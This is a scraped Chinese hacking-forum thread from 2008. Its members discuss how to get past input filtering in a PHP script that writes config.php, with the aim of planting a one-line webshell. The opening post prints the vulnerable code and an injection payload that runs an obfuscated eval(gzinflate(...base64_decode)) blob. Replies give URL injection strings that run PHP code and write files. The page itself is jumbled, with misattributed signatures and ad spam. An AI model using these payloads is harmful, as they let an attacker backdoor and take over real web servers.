返回列表 发帖
valen886

Rank: 6Rank: 6

帖子
310 
积分
810 
威望
1302  
金钱
1010  
在线时间
2 小时 

内部成员灌水王
1 跳转到 » 倒序看帖
打印
tT
发表于 2008-7-25 13:52 | 只看该作者

[讨论]如何突破这段代码写入一句话[更新]

代码, 讨论
[讨论]如何突破这段代码写入一句话[更新]
信息来源:邪恶八进制信息安全团队(www.eviloctal.com

这里先向楼下回帖的朋友道个歉,由于发帖时疏忽,没有仔细看代码,导致代码发错。

环境如下:
PHP中的magic_quotes_gpc为on

原来发错的代码:
<?
$fp = @fopen("config.php", "w");
$myarrs = $_REQUEST["conf"];
  if (isset($fp)) {

   @fputs($fp, "<?php\n// Created ".date("Y-m-d H:i:s")."\n\n");
    $forbidden_values = array(&#39;{&#39;, &#39;}&#39;, &#39;$&#39;);
    foreach ($myarrs as $key => $value) {
      $value = str_replace($forbidden_values, &#39;&#39;, $value);
      @fputs($fp, "// ".$Site_conF[$key][1]."\n\$S_conf[\"".$key."\"] = \"".str_replace(&#39;"&#39;, &#39;\\"&#39;, $value)."\";\n\n");
    }
    @fclose($fp);
    print "<div align=\"center\"><strong>config_saved</strong></div>";
  } else {
    print "<div align=\"center\"><strong>FAIL</strong></div>";
  }
  @fclose($fp);
  ?>

现在需要突破的代码是:]
< ?
$fp = @fopen("config.php", "w");
  $arrVar = $_REQUEST["conf"];
  if (isset($fp)) {
    @fputs($fp, "<?php \n# Created ".date("Y-m-d H:i:s")."\n\n");
    foreach ($arrVar as $key => $value) {
      @fputs($fp, "// ".$S_CONF[$key][1]."\n\$S_CONF[\"".$key."\"] = \"".htmlspecialchars($value)."\";\n\n");
      }
    @fputs($fp, "\n?>");
    @fclose($fp);
    print "<div align=\"center\"><strong>config_saved</strong></div>";
    }
  else {
    print "<div align=\"center\"><strong>entryins_fail</strong></div>";
    }
  @fclose($fp);
?>


实现目的:在config.php里写入一句话,能成功连接。

对原来发错的代码,由于它在CONN里的对单引号作了stripcslashes处理,所以,我的突破思路是用压缩方法 传递如下参数:

\";?>
<?php
eval(gzinflate(gzuncompress(base64_decode(&#39;eJzz1vU+czGgk/8DP1+nnqant17n1S1sDABh6QgQ&#39;))))
?>

对于现在需要突破的这个代码,我仍无法解决,请大家讨论。TTFCT http://WWW.TTFCT.COM

帖子279 精华4 积分4349 阅读权限100 性别男 在线时间111 小时 注册时间2006-2-13 最后登录2008-7-20 查看详细资料TOP 爱要怎么说出口


hackest
运维管理组
收藏 分享

肥华叔

Rank: 1

帖子
26 
积分
38 
威望
49  
金钱
40  
在线时间
0 小时 
2
发表于 2008-7-25 13:52 | 只看该作者
不在我能力范围之内,爱莫能助  My Blog:http://www.hackest.cn/ [H.S.T]:http://www.hackm.com/

帖子882 精华20 积分5849 阅读权限150 性别男 来自广东 在线时间941 小时 注册时间2006-10-12 最后登录2008-3-3 查看个人网站
查看详细资料TOP 您知道您年薪应是多少?

ttfct
荣誉会员

TOP

LXQ

Rank: 1

帖子
积分
威望
10  
金钱
10  
在线时间
0 小时 
3
发表于 2008-7-25 13:52 | 只看该作者
会PHP的朋友都来看看,看有方法突破不TTFCT http://WWW.TTFCT.COM

帖子279 精华4 积分4349 阅读权限100 性别男 在线时间111 小时 注册时间2006-2-13 最后登录2008-7-20 查看详细资料TOP 软件项目外包

小贼
荣誉会员

TOP

神童

Rank: 1

帖子
17 
积分
26 
威望
34  
金钱
33  
在线时间
0 小时 
4
发表于 2008-7-25 13:52 | 只看该作者
好象也不在俺滴管辖范围内webblog:      http://hi.baidu.com/zei86/

帖子146 精华1 积分3148 阅读权限100 在线时间59 小时 注册时间2006-9-17 最后登录2008-6-29 查看详细资料TOP

剑心
荣誉会员

TOP

hycmx

Rank: 1

帖子
17 
积分
26 
威望
34  
金钱
33  
在线时间
0 小时 
5
发表于 2008-7-25 13:52 | 只看该作者
本来这种写法是非常好的!!!赞个,但是他逻辑上存在点小问题导致可以轻易写shell,在你这个条件下
复制内容到剪贴板
代码:
fuck.php?conf[a]=abc";phpinfo();//
如果方便希望能说下这个脚本的名字
谢谢
帖子83 精华0 积分3045 阅读权限100 在线时间84 小时 注册时间2005-1-2 最后登录2008-4-11 查看详细资料TOP 让女孩一夜变的更有女人味

剑心
荣誉会员

TOP

紫绫

Rank: 1

帖子
18 
积分
27 
威望
36  
金钱
34  
在线时间
0 小时 
6
发表于 2008-7-25 13:52 | 只看该作者
可能没说到位,上面能证明可以用函数了,不过不允许用变量那么就简单了

fuck.php?conf[a]=abc";fputs(fopen(urldecode(")))//
自己发挥吧
帖子83 精华0 积分3045 阅读权限100 在线时间84 小时 注册时间2005-1-2 最后登录2008-4-11 查看详细资料TOP 少女暴富的隐秘(图)

剑心
荣誉会员

TOP

沙包

Rank: 1

帖子
积分
14 
威望
18  
金钱
18  
在线时间
0 小时 
7
发表于 2008-7-25 13:52 | 只看该作者
仔细想写会发现他这个等于没过滤 :) 呵呵
有意思的脚本
帖子83 精华0 积分3045 阅读权限100 在线时间84 小时 注册时间2005-1-2 最后登录2008-4-11 查看详细资料TOP 让女孩一夜变的更有女人味

ttfct
荣誉会员

TOP

死性不改

Rank: 1

帖子
15 
积分
23 
威望
30  
金钱
30  
在线时间
0 小时 
8
发表于 2008-7-25 13:52 | 只看该作者
给楼上的道个歉,我把代码发错了。TTFCT http://WWW.TTFCT.COM

帖子279 精华4 积分4349 阅读权限100 性别男 在线时间111 小时 注册时间2006-2-13 最后登录2008-7-20 查看详细资料TOP

aosemp
晶莹剔透§烈日灼然

TOP

返回列表